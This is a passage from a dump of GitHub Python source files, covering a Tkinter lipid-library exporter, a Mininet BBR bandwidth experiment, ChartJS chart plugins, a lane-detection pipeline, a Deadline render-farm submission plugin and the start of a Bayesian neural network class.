cancelrun():\n expwind.destroy()\n root()\n button1 = tk.Button(expwind,text = 'confirm',command = base_selection)\n button1.config(font=(\"Times New Roman\", 12))\n addbutton = tk.Button(expwind,text = 'add',command = add_base)\n addbutton.config(font=(\"Times New Roman\", 12))\n title.grid(row = 0,column = 0,padx=20)\n listbox1.grid(row = 1,column = 0,rowspan = 9,padx=20)\n button1.grid(row = 10,column = 0,padx=20)\n subtitle.grid(row = 0,column = 1,padx=20)\n other.grid(row = 1,column = 1,padx=20)\n addbutton.grid(row = 2,column = 1,padx=20)\n cancel = tk.Button(expwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n cancel.grid(row = 10,column = 20)\n expwind.mainloop()\n def toexcel(self):\n with pd.ExcelWriter(filename) as writer:\n self.df = {}\n for i,b in enumerate(base_input):\n name = [b+'('+j+')' for j in sn_input[i]]\n self.df[b] = pd.DataFrame({b: name})\n self.df[b]['formula'] = [self.msformula(j,'molecule') for j in name]\n for ion in ion_input:\n ms = [self.mscalculator(i,ion) for i in self.df[b][b]]\n self.df[b][ion] = ms\n self.df[b].to_excel(writer,index = False,sheet_name = '{}'.format(b))\n# %% [markdown]\n# GUI\n\n# %%\ndef entry():\n package_available = {'Sphingolipid': package_sl,'Glycerophospholipid': package_gpl}\n entrywind = tk.Tk()\n entrywind.geometry('500x300')\n title = tk.Label(entrywind,text = 'Welcome! choose package(s)')\n title.config(font=(\"Times New Roman\", 20))\n var_pack = tk.StringVar()\n var_pack.set(list(package_available.keys()))\n listbox = tk.Listbox(entrywind,listvariable = var_pack,selectmode = 'extended')\n def choose_pack():\n pack = [listbox.get(i) for i in listbox.curselection()]\n global currentlibrary\n currentlibrary = library([package_available[i] for i in pack])\n entrywind.destroy()\n root()\n button = tk.Button(entrywind,text = 'confirm',command = choose_pack)\n button.config(font=(\"Times New Roman\", 12))\n title.pack()\n listbox.pack()\n button.pack()\n entrywind.mainloop()\ndef root():\n rootwind = tk.Tk()\n rootwind.geometry('500x300')\n def run_export():\n rootwind.destroy()\n global exp\n exp = True\n def cancelrun():\n rootwind.destroy()\n global exp\n exp = False\n del currentlibrary\n title = tk.Label(rootwind,text = 'Root')\n title.config(font=(\"Times New Roman\", 20))\n export = tk.Button(rootwind,text = 'Export data',command = run_export)\n export.config(font=(\"Times New Roman\", 12))\n cancel = tk.Button(rootwind,text = 'cancel',command = cancelrun)\n cancel.config(font=(\"Times New Roman\", 12))\n title.pack(pady = 5)\n export.pack(pady = 5)\n cancel.pack(pady = 5)\n rootwind.mainloop()\nwhile __name__ == '__main__':\n entry()\n while exp == True:\n currentlibrary.export()\n\n","repo_name":"yufongpeng/labtools","sub_path":"labtools/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":32774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44786147641","text":"import json\nimport os\n\nfrom mininet.net import Mininet\nfrom mininet.node import Host\nfrom mininet.link import TCLink\nfrom mininet.topo import Topo\nimport threading\nimport time\nimport sys\n\n# Define the timer function\ndef timer_function(duration):\n start_time = time.time()\n end_time = start_time + duration\n\n while time.time() < end_time:\n remaining_time = end_time - time.time()\n sys.stdout.write(\"\\rTime remaining: {:.2f} seconds\".format(remaining_time))\n sys.stdout.flush()\n time.sleep(1) # Update every 1 second\n\n print(\"Timer has finished!\")\n\ndef run_iperf_test(host, flow, dst_IP, duration, cc):\n cmd = f'{host} iperf3 -c {dst_IP} -t {duration} -C {cc} -J > json_files/h{flow}_{cc}_out.json &'\n os.system(cmd)\n\ndef change_btlbw(btlbw):\n delay = 20e-3\n BDP = 1\n burst = int(btlbw/250/8)\n limit = int(BDP*btlbw*delay*(1.024**2)/8) # Setting the limit to BDP\n\n sys.stdout.write(f\"\\n\\rCurrent BDP: {BDP}\\n\" )\n tbf_cmd = f'tc qdisc change dev s1-eth1 parent 1: handle 2: tbf rate {btlbw} burst {burst} limit {limit}'\n os.system(tbf_cmd)\n\ndef main():\n h = '/home/admin/mininet/util/m hs'\n \n duration = 300\n print(\"Starting test\")\n\n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(5)\n flow = 1\n run_iperf_test(f\"{h}{flow}\", flow, f\"10.0.1.{flow}\", duration, \"bbr\")\n time.sleep(60)\n\n print(\"Changing Btlbw to 1Gbps\")\n change_btlbw(1e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 1Gbps\")\n change_btlbw(1e9)\n time.sleep(60)\n \n print(\"Changing Btlbw to 500Mbps\")\n change_btlbw(0.5e9)\n time.sleep(60)\n \n sys.stdout.write(\"\\n\\rTest is done\\n\")\n time.sleep(5)\n\nif __name__ == '__main__':\n main()\n\n \n ","repo_name":"gomezgaona/bbr3","sub_path":"experiments/changing/run_changing.py","file_name":"run_changing.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26349761893","text":"from .. import ChartJSRenderer\nfrom prewikka.renderer import RendererUtils, RendererNoDataException\nfrom prewikka import version\n\n\nclass ChartJSCircularPlugin(ChartJSRenderer):\n plugin_author = version.__author__\n plugin_license = version.__license__\n plugin_version = version.__version__\n plugin_copyright = version.__copyright__\n\n def render(self, data, query=None, **kwargs):\n \"\"\" Return the HTML for this chart\n\n Keyword arguments:\n data -- List of tuple containing the data for this chart\n [(count, value, link), ]\n \"\"\"\n\n rutils = RendererUtils(kwargs)\n labels = []\n colors = []\n pie_data = []\n mapping = {}\n\n for i, d in enumerate(data):\n for count, value, link in d:\n label = rutils.get_label(value)\n pie_data.append(count)\n labels.append(label)\n mapping[label] = link\n colors.append(self._rgba(rutils.get_color(value), 1))\n\n if not pie_data:\n raise RendererNoDataException\n\n options = {\n \"labels\": labels,\n \"datasets\": [{\n \"backgroundColor\": colors,\n \"data\": pie_data\n }]\n }\n\n return self.generate_html(kwargs, options, {\"layout\": {\"padding\": {\"bottom\": 20}}}, self.renderer_type, mapping)\n\n\nclass ChartJSPiePlugin(ChartJSCircularPlugin):\n \"\"\" ChartJS pie plugin \"\"\"\n\n renderer_type = \"pie\"\n\n plugin_name = \"ChartJS : Pie\"\n plugin_description = N_(\"ChartJS Pie renderer type\")\n\n\nclass ChartJSDoughnutPlugin(ChartJSCircularPlugin):\n \"\"\" ChartJS doughnut plugin \"\"\"\n\n renderer_type = \"doughnut\"\n\n plugin_name = \"ChartJS : Doughnut\"\n plugin_description = N_(\"ChartJS Doughnut renderer type\")\n","repo_name":"pedroloco/SECEF-prototype","sub_path":"prewikka/prewikka/renderer/chartjs/pie/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42103292216","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.image as mpimg\nimport glob\nimport os\n\nfrom thresholding_utils import abs_sobel_thresh, mag_thresh, dir_threshold, hls_select\nfrom misc_utils import show_img, showstep, adjust_original_image, draw_on_original, mask, transform\nfrom lanedetect import sliding_window, fit_polynomial, fit_poly, search_around_poly\nfrom calibration import cal_transform, cal_undistort, maincal\n\ndir_path = os.path.dirname(os.path.abspath(__file__))\nnx = 9\nny = 6\nSCALAR_EBLUE = (255, 255, 102)\n\ncal_images = glob.glob('./camera_cal/calibration*.jpg')\n\n\nobjpoints = []\nimgpoints = []\nlst_images = []\nobjp = np.zeros((ny*nx, 3), np.float32)\n# create nx*ny points of xyz coordinates\nobjp[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2)\n\nym_per_pix = 30 / 720 # meters per pixel in y dimension\nxm_per_pix = 3.7 / 700 # meters per pixel in x dimension\n\n\ndef measure_curvature_pixels(ploty, left_fit, right_fit, left_fitx, right_fitx):\n # We'll choose the maximum y-value, corresponding to the bottom of the image\n yval = np.max(ploty)\n\n A = left_fit[0]\n B = left_fit[1]\n C = left_fit[2]\n\n d1_left = 2*A*yval + B\n d2_left = 2*A\n left_curverad = (1+(d1_left)**2)**(3/2)/abs(d2_left) * ym_per_pix\n\n D = right_fit[0]\n E = right_fit[1]\n F = right_fit[2]\n\n d1_right = 2*D*yval + E\n d2_right = 2*D\n right_curverad = (1+(d1_right)**2)**(3/2)/abs(d2_right) * ym_per_pix\n\n lane_middle = left_fitx[0] + (right_fitx[0] - left_fitx[0])/2.0\n\n deviation = (lane_middle - 640)*xm_per_pix\n return left_curverad, right_curverad, deviation\n\n\ndef main():\n # calibration\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n imgpointsa, objpointsa = maincal(cal_images, objpoints, imgpoints, objp)\n\n dir_vid = dir_path + \"/test_videos\"\n print(dir_vid)\n vid = dir_vid + \"/project_video.mp4\"\n\n cap = cv2.VideoCapture(vid)\n print(cap.isOpened())\n out = cv2.VideoWriter('./test_out/pipeline.mp4', fourcc, 30.0, (1280, 695))\n while cap.isOpened():\n ret, img = cap.read()\n img, corners = cal_undistort(objpointsa, imgpointsa, img)\n # cv2.imshow(\"original\", img)\n gradbinary = abs_sobel_thresh(img, thresh_min=10, thresh_max=255)\n magbinary = mag_thresh(img, mag_thresh=(10, 255))\n # experiment with the combination of threshold values\n dirbinary = dir_threshold(img, sobel_kernel=3, thresh=(0.5, 1.3))\n hlsbinary = hls_select(img, thresh=(70, 255), thresh2=(0, 255))\n # show_img(hlsbinary, showstep=False, name=\"hls\")\n\n combined = np.zeros_like(dirbinary)\n #combined[(gradbinary == 255)&((magbinary == 255) & (dirbinary == 255))] = 255\n combined[(hlsbinary == 255) & (magbinary == 255)] = 255\n height_adjustment = 25\n vertices, masked_image, img2 = mask(combined, adjustment=height_adjustment)\n\n imgOriginalAdjusted = adjust_original_image(img, adjustment=height_adjustment)\n\n # cv2.imshow(\"adjusted\", imgOriginalAdjusted)\n # print(masked_image)\n # show_img(masked_image, showstep=True, name=\"masked\")\n # cv2.imshow(\"masked\", masked_image)\n warped = transform(masked_image, vertices)\n\n histogram, leftx, lefty, rightx, righty, out_img = sliding_window(warped)\n\n out_img, left_fit, right_fit, ploty = fit_polynomial(warped)\n result, left_fitx, right_fitx, pts = search_around_poly(warped, left_fit, right_fit)\n # plt.plot(histogram)\n # plt.show()\n # plt.pause(0.0005)\n # show_img(out_img, name=\"sliding window\", showstep=True)\n # show_img(result, name=\"polyfit\", showstep=True)\n\n dewarped = transform(result, vertices, mode=\"dewarp\")\n # show_img(dewarped, name=\"dewarped\", showstep=True)\n\n blended = draw_on_original(imgOriginalAdjusted, leftx, lefty, rightx, righty,\n vertices, pts)\n\n left_curverad, right_curverad, deviation = measure_curvature_pixels(\n ploty, left_fit, right_fit, left_fitx, right_fitx)\n # print(\"radius: \", left_curverad, right_curverad)\n\n cv2.putText(blended, \"Left curvature: {}, Right curvature: {}, Deviaton: {}\".format(\n left_curverad, right_curverad, deviation), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, SCALAR_EBLUE, 2)\n\n # print(blended.shape)\n # show_img(blended, name=\"blended\", showstep=True)\n out.write(blended)\n if cv2.waitKey(1) == ord(\"q\"):\n break\n cap.release()\n cv2.destroyAllWindows()\n\n\n# plt.ion()\nmain()\n\n# use this to debug\n# for i in range(20,150,5):\n# abs_sobel_thresh(img, thresh_min=i, thresh_max=255)\n\n# for i in range(5,150,5):\n# mag_thresh(img, sobel_kernel=3, mag_thresh=(i, 255))\n# print(i)\n# at 50 start to get less noisier lane lines\n\n# for i in range(10,150,5):\n# hls_binary = hls_select(img, thresh=(i, 255))\n\n# mag_thresh(img)\n# dir_threshold(img)\n","repo_name":"nicholasprayogo/udacity_selfdrivingcar_nanodegree","sub_path":"part1_p12_lane_detection/p2_adv_lane_detection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3826779321","text":"import os\nimport subprocess\n\ntry:\n import hou\nexcept:\n pass\n\ntry:\n from PySide2.QtCore import *\n from PySide2.QtGui import *\n from PySide2.QtWidgets import *\nexcept:\n from PySide.QtCore import *\n from PySide.QtGui import *\n\nfrom PrismUtils.Decorators import err_catcher as err_catcher\n\n\nclass Prism_Deadline_Functions(object):\n def __init__(self, core, plugin):\n self.core = core\n self.plugin = plugin\n\n @err_catcher(name=__name__)\n def isActive(self):\n try:\n return len(self.getDeadlineGroups()) > 0\n except:\n return False\n\n @err_catcher(name=__name__)\n def deadlineCommand(self, arguments, background=True, readStdout=True):\n deadlineBin = os.getenv(\"DEADLINE_PATH\")\n if deadlineBin is None:\n return False\n deadlineCommand = os.path.join(deadlineBin, \"deadlinecommand.exe\")\n\n startupinfo = None\n creationflags = 0\n if background:\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess._subprocess.STARTF_USESHOWWINDOW\n else:\n # still show top-level windows, but don't show a console window\n CREATE_NO_WINDOW = 0x08000000 # MSDN process creation flag\n creationflags = CREATE_NO_WINDOW\n\n arguments.insert(0, deadlineCommand)\n\n stdoutPipe = None\n if readStdout:\n stdoutPipe = subprocess.PIPE\n\n # Specifying PIPE for all handles to workaround a Python bug on Windows. The unused handles are then closed immediatley afterwards.\n proc = subprocess.Popen(\n arguments,\n cwd=deadlineBin,\n stdin=subprocess.PIPE,\n stdout=stdoutPipe,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo,\n creationflags=creationflags,\n )\n proc.stdin.close()\n proc.stderr.close()\n\n output = \"\"\n if readStdout:\n output = proc.stdout.read()\n return output\n\n @err_catcher(name=__name__)\n def blenderDeadlineCommand(self):\n deadlineBin = \"\"\n try:\n deadlineBin = os.environ[\"DEADLINE_PATH\"]\n except KeyError:\n pass\n\n if deadlineBin == \"\":\n return None\n\n deadlineCommand = os.path.join(deadlineBin, \"deadlinecommand\")\n\n return deadlineCommand\n\n @err_catcher(name=__name__)\n def getDeadlineGroups(self, subdir=None):\n if not hasattr(self, \"deadlineGroups\"):\n if self.core.appPlugin.pluginName == \"Blender\":\n deadlineCommand = self.blenderDeadlineCommand()\n\n if deadlineCommand is None:\n return []\n\n startupinfo = None\n\n args = [deadlineCommand, \"-groups\"]\n if subdir != None and subdir != \"\":\n args.append(subdir)\n\n # Specifying PIPE for all handles to workaround a Python bug on Windows. The unused handles are then closed immediatley afterwards.\n proc = subprocess.Popen(\n args,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n startupinfo=startupinfo,\n )\n\n proc.stdin.close()\n proc.stderr.close()\n\n output = proc.stdout.read()\n\n output = output.decode(\"utf_8\")\n\n else:\n output = self.deadlineCommand([\"-groups\"])\n\n if output != False and not \"Error\" in output:\n self.deadlineGroups = output.splitlines()\n else:\n self.deadlineGroups = []\n\n return self.deadlineGroups\n\n @err_catcher(name=__name__)\n def sm_dep_startup(self, origin):\n origin.tw_caches.itemClicked.connect(\n lambda x, y: self.sm_updateDlDeps(origin, x, y)\n )\n origin.tw_caches.itemDoubleClicked.connect(self.sm_dlGoToNode)\n\n @err_catcher(name=__name__)\n def sm_updateDlDeps(self, origin, item, column):\n if len(item.toolTip(0).split(\"\\n\")) == 1:\n return\n\n if (\n item.toolTip(0).split(\"\\n\")[1]\n in [x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]]\n and item.checkState(0) == Qt.Unchecked\n ):\n origin.dependencies[\"Deadline\"].remove(item.toolTip(0))\n elif (\n not item.toolTip(0).split(\"\\n\")[1]\n in [x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]]\n ) and item.checkState(0) == Qt.Checked:\n origin.dependencies[\"Deadline\"].append(item.toolTip(0))\n\n origin.nameChanged(origin.e_name.text())\n\n origin.stateManager.saveStatesToScene()\n\n @err_catcher(name=__name__)\n def sm_dlGoToNode(self, item, column):\n if item.parent() is None:\n return\n\n node = hou.node(item.toolTip(0).split(\"\\n\")[1])\n\n if node is not None:\n node.setCurrent(True, clear_all_selected=True)\n paneTab = hou.ui.paneTabOfType(hou.paneTabType.NetworkEditor)\n if paneTab is not None:\n paneTab.frameSelection()\n\n @err_catcher(name=__name__)\n def sm_dep_updateUI(self, origin):\n origin.gb_osDependency.setVisible(False)\n origin.gb_dlDependency.setVisible(True)\n\n origin.tw_caches.clear()\n QTreeWidgetItem(origin.tw_caches, [\"Import\"])\n QTreeWidgetItem(origin.tw_caches, [\"Export\"])\n\n fileNodeList = []\n copFileNodeList = []\n ropDopNodeList = []\n ropCopNodeList = []\n ropSopNodeList = []\n ropAbcNodeList = []\n filecacheNodeList = []\n\n for node in hou.node(\"/\").allSubChildren():\n if node.type().name() == \"file\":\n if (\n node.type().category().name() == \"Sop\"\n and len(node.parm(\"file\").keyframes()) == 0\n ):\n fileNodeList.append(node)\n elif (\n node.type().category().name() == \"Cop2\"\n and len(node.parm(\"filename1\").keyframes()) == 0\n ):\n copFileNodeList.append(node)\n elif (\n node.type().name() == \"rop_dop\"\n and len(node.parm(\"dopoutput\").keyframes()) == 0\n ):\n ropDopNodeList.append(node)\n elif (\n node.type().name() == \"rop_comp\"\n and len(node.parm(\"copoutput\").keyframes()) == 0\n ):\n ropCopNodeList.append(node)\n elif (\n node.type().name() == \"rop_geometry\"\n and len(node.parm(\"sopoutput\").keyframes()) == 0\n ):\n ropSopNodeList.append(node)\n elif (\n node.type().name() == \"rop_alembic\"\n and len(node.parm(\"filename\").keyframes()) == 0\n ):\n ropAbcNodeList.append(node)\n elif (\n node.type().name() == \"filecache\"\n and len(node.parm(\"file\").keyframes()) == 0\n ):\n filecacheNodeList.append(node)\n\n for i in fileNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(0), [itemName])\n item.setToolTip(0, i.parm(\"file\").unexpandedString() + \"\\n\" + i.path())\n\n for i in copFileNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(0), [itemName])\n item.setToolTip(0, i.parm(\"filename1\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropDopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"dopoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropCopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"copoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in ropSopNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"sopoutput\").unexpandedString() + \"\\n\" + i.path())\n\n for i in filecacheNodeList:\n itemName = os.path.basename(i.path())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"file\").unexpandedString() + \"\\n\" + i.path())\n\n # alembic dependency disabled because no progress measureable\n for i in ropAbcNodeList:\n itemName = os.path.basename(i.parm(\"filename\").unexpandedString())\n item = QTreeWidgetItem(origin.tw_caches.topLevelItem(1), [itemName])\n item.setToolTip(0, i.parm(\"filename\").unexpandedString() + \"\\n\" + i.path())\n\n items = []\n for i in range(origin.tw_caches.topLevelItemCount()):\n origin.tw_caches.topLevelItem(i).setExpanded(True)\n for k in range(origin.tw_caches.topLevelItem(i).childCount()):\n items.append(origin.tw_caches.topLevelItem(i).child(k))\n\n newActive = []\n for i in items:\n if i.toolTip(0).split(\"\\n\")[1] in [\n x.split(\"\\n\")[1] for x in origin.dependencies[\"Deadline\"]\n ]:\n i.setCheckState(0, Qt.Checked)\n newActive.append(i.toolTip(0))\n else:\n i.setCheckState(0, Qt.Unchecked)\n\n origin.dependencies[\"Deadline\"] = newActive\n\n @err_catcher(name=__name__)\n def sm_dep_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_dep_execute(self, origin, parent):\n origin.dependencies[\"Deadline\"] = [\n x\n if not x.split(\"\\n\")[0]\n in origin.stateManager.publishInfos[\"updatedExports\"]\n else \"%s\\n%s\"\n % (\n origin.stateManager.publishInfos[\"updatedExports\"][x.split(\"\\n\")[0]],\n x.split(\"\\n\")[1],\n )\n for x in origin.dependencies[\"Deadline\"]\n ]\n\n parent.dependencies += [\n [origin.sp_offset.value(), hou.expandString(x.split(\"\\n\")[0])]\n for x in origin.dependencies[\"Deadline\"]\n ]\n\n @err_catcher(name=__name__)\n def sm_houExport_startup(self, origin):\n origin.cb_dlGroup.addItems(self.getDeadlineGroups())\n\n @err_catcher(name=__name__)\n def sm_houExport_activated(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.f_osUpload.setVisible(False)\n origin.f_osPAssets.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_dlGroup.setVisible(True)\n\n @err_catcher(name=__name__)\n def sm_houExport_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_houRender_updateUI(self, origin):\n showGPUsettings = (\n origin.node is not None and origin.node.type().name() == \"Redshift_ROP\"\n )\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_houRender_managerChanged(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.f_osUpload.setVisible(False)\n\n origin.f_osPAssets.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_dlGroup.setVisible(True)\n\n origin.w_dlConcurrentTasks.setVisible(True)\n\n showGPUsettings = (\n origin.node is not None and origin.node.type().name() == \"Redshift_ROP\"\n )\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_houRender_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_render_updateUI(self, origin):\n curRenderer = getattr(self.core.appPlugin, \"getCurrentRenderer\", lambda x: \"\")(\n origin\n ).lower()\n showGPUsettings = \"redshift\" in curRenderer if curRenderer else True\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n @err_catcher(name=__name__)\n def sm_render_managerChanged(self, origin):\n origin.f_osDependencies.setVisible(False)\n origin.gb_osSlaves.setVisible(False)\n origin.f_osUpload.setVisible(False)\n\n origin.f_dlGroup.setVisible(True)\n origin.w_dlConcurrentTasks.setVisible(True)\n\n curRenderer = getattr(self.core.appPlugin, \"getCurrentRenderer\", lambda x: \"\")(\n origin\n ).lower()\n showGPUsettings = \"redshift\" in curRenderer if curRenderer else True\n origin.w_dlGPUpt.setVisible(showGPUsettings)\n origin.w_dlGPUdevices.setVisible(showGPUsettings)\n\n getattr(self.core.appPlugin, \"sm_render_managerChanged\", lambda x, y: None)(\n origin, False\n )\n\n @err_catcher(name=__name__)\n def sm_render_preExecute(self, origin):\n warnings = []\n\n return warnings\n\n @err_catcher(name=__name__)\n def sm_render_submitJob(self, origin, jobOutputFile, parent):\n if self.core.appPlugin.pluginName == \"Houdini\":\n jobOutputFile = jobOutputFile.replace(\"$F4\", \"####\")\n\n homeDir = (\n self.deadlineCommand([\"-GetCurrentUserHomeDirectory\"], background=False)\n ).decode(\"utf-8\")\n\n if homeDir == False:\n return \"Execute Canceled: Deadline is not installed\"\n\n homeDir = homeDir.replace(\"\\r\", \"\").replace(\"\\n\", \"\")\n\n dependencies = parent.dependencies\n\n jobName = (\n os.path.splitext(self.core.getCurrentFileName(path=False))[0]\n + origin.l_taskName.text()\n )\n jobGroup = origin.cb_dlGroup.currentText()\n jobPrio = origin.sp_rjPrio.value()\n jobTimeOut = str(origin.sp_rjTimeout.value())\n jobMachineLimit = \"0\"\n jobFamesPerTask = origin.sp_rjFramesPerTask.value()\n concurrentTasks = (\n 1\n if not hasattr(origin, \"sp_dlConcurrentTasks\")\n else origin.sp_dlConcurrentTasks.value()\n )\n\n if origin.chb_globalRange.isChecked():\n jobFrames = (\n str(origin.stateManager.sp_rangeStart.value())\n + \"-\"\n + str(origin.stateManager.sp_rangeEnd.value())\n )\n else:\n jobFrames = (\n str(origin.sp_rangeStart.value())\n + \"-\"\n + str(origin.sp_rangeEnd.value())\n )\n\n # Create submission info file\n\n jobInfos = {}\n\n jobInfos[\"Name\"] = jobName\n jobInfos[\"Group\"] = jobGroup\n jobInfos[\"Priority\"] = jobPrio\n jobInfos[\"TaskTimeoutMinutes\"] = jobTimeOut\n jobInfos[\"MachineLimit\"] = jobMachineLimit\n jobInfos[\"Frames\"] = jobFrames\n jobInfos[\"ChunkSize\"] = jobFamesPerTask\n jobInfos[\"OutputFilename0\"] = jobOutputFile\n jobInfos[\n \"EnvironmentKeyValue0\"\n ] = \"prism_project=%s\" % self.core.prismIni.replace(\"\\\\\", \"/\")\n\n if origin.chb_rjSuspended.isChecked():\n jobInfos[\"InitialStatus\"] = \"Suspended\"\n\n if (\n hasattr(origin, \"w_dlConcurrentTasks\")\n and not origin.w_dlConcurrentTasks.isHidden()\n ):\n jobInfos[\"ConcurrentTasks\"] = concurrentTasks\n\n if len(dependencies) > 0:\n jobInfos[\"IsFrameDependent\"] = \"true\"\n jobInfos[\"ScriptDependencies\"] = os.path.join(\n self.core.projectPath, \"00_Pipeline\", \"Scripts\", \"DeadlineDependency.py\"\n )\n\n # Create plugin info file\n\n pluginInfos = {}\n pluginInfos[\"Build\"] = \"64bit\"\n\n if hasattr(origin, \"w_dlGPUpt\") and not origin.w_dlGPUpt.isHidden():\n pluginInfos[\"GPUsPerTask\"] = origin.sp_dlGPUpt.value()\n\n if hasattr(origin, \"w_dlGPUdevices\") and not origin.w_dlGPUdevices.isHidden():\n pluginInfos[\"GPUsSelectDevices\"] = origin.le_dlGPUdevices.text()\n\n dlParams = {\n \"jobInfos\": jobInfos,\n \"pluginInfos\": pluginInfos,\n \"jobInfoFile\": \"\",\n \"pluginInfoFile\": \"\",\n }\n self.core.appPlugin.sm_render_getDeadlineParams(origin, dlParams, homeDir)\n\n if len(dependencies) > 0:\n dependencyFile = os.path.join(homeDir, \"temp\", \"dependencies.txt\")\n fileHandle = open(dependencyFile, \"w\")\n\n for i in dependencies:\n fileHandle.write(str(i[0]) + \"\\n\")\n fileHandle.write(str(i[1]) + \"\\n\")\n\n fileHandle.close()\n\n arguments = []\n arguments.append(dlParams[\"jobInfoFile\"])\n arguments.append(dlParams[\"pluginInfoFile\"])\n for i in self.core.appPlugin.getCurrentSceneFiles(origin):\n arguments.append(i)\n\n if \"dependencyFile\" in locals():\n arguments.append(dependencyFile)\n\n self.core.callback(\n name=\"preSubmit_Deadline\",\n types=[\"custom\"],\n args=[self, jobInfos, pluginInfos, arguments],\n )\n\n with open(dlParams[\"jobInfoFile\"], \"w\") as fileHandle:\n for i in jobInfos:\n fileHandle.write(\"%s=%s\\n\" % (i, jobInfos[i]))\n\n with open(dlParams[\"pluginInfoFile\"], \"w\") as fileHandle:\n for i in pluginInfos:\n fileHandle.write(\"%s=%s\\n\" % (i, pluginInfos[i]))\n\n jobResult = self.deadlineCommand(arguments, background=False).decode(\"utf-8\")\n\n self.core.callback(\n name=\"postSubmit_Deadline\", types=[\"custom\"], args=[self, jobResult]\n )\n\n return jobResult\n","repo_name":"heylenz/Prism","sub_path":"Prism/Plugins/RenderfarmManagers/Deadline/Scripts/Prism_Deadline_Functions.py","file_name":"Prism_Deadline_Functions.py","file_ext":"py","file_size_in_byte":18040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"22063012860","text":"import numpy as np\nimport math\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nfrom tensorflow_probability.python.layers import util as tfp_layers_util\ntfd = tfp.distributions\n# some the research2018 repo can be accessed from https://github.com/dmorrill10/research2018.git\n\n\"\"\"\nCreates a learnable variational normal distribution\nBoth the mean and variance are parameterized and are learnable by tensorflow\nThe variance is constrained to be non-negative\n\"\"\"\ndef VariationalParameter(name, shape):\n means = tf.get_variable(name+'_mean', initializer=0.1 * tf.ones([1]), constraint=tf.keras.constraints.NonNeg())\n stds = tf.get_variable(name+'_std', initializer=1 * tf.ones([1]))\n return tfd.Normal(loc=means, scale=stds)\n\n\"\"\"\nCreates a *non*-learnable vector of normal distributions\nThis is used to regularize the weights\nWeights will be pulled towards this distribution on each step\n\"\"\"\nclass KernelPrior:\n def __init__(self, stddev):\n self.stddev = stddev\n\n def output(self, dtype, shape, name, trainable, add_variable_fn):\n dist = tfd.Normal(loc=tf.zeros(shape, dtype), scale=dtype.as_numpy_dtype(self.stddev)) #prior mean is zeros\n batch_ndims = tf.size(dist.batch_shape_tensor())\n return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)\n\nclass BNN:\n def __init__(self, features, params={'prior_mean_hidden_layer': -1e-5,\n 'prior_stddev_hidden_layer': 1e-6,\n 'prior_stddev_outer_layer': 1e-8}):\n self.features = features\n # Inputs to the tensorflow graph. X will be our phi(S, A), Y will be our reward\n self.X = tf.placeholder(tf.float32, [None, features])\n self.Y = tf.placeholder(tf.float32, [None, 1])\n self.hidden_layer_mean = params['prior_mean_hidden_layer']\n self.hidden_layer_stddev = params['prior_stddev_hidden_layer']\n self.outer_layer_sttdev = params['prior_stddev_outer_layer']\n\n # Should be expandable to a deep network by adding more layers\n # Can add dense flipout layers for fully bayesian or could add simple dense or convolutional layers\n # to project into a smaller feature space before doing full distributions (would be more computationally efficient)\n 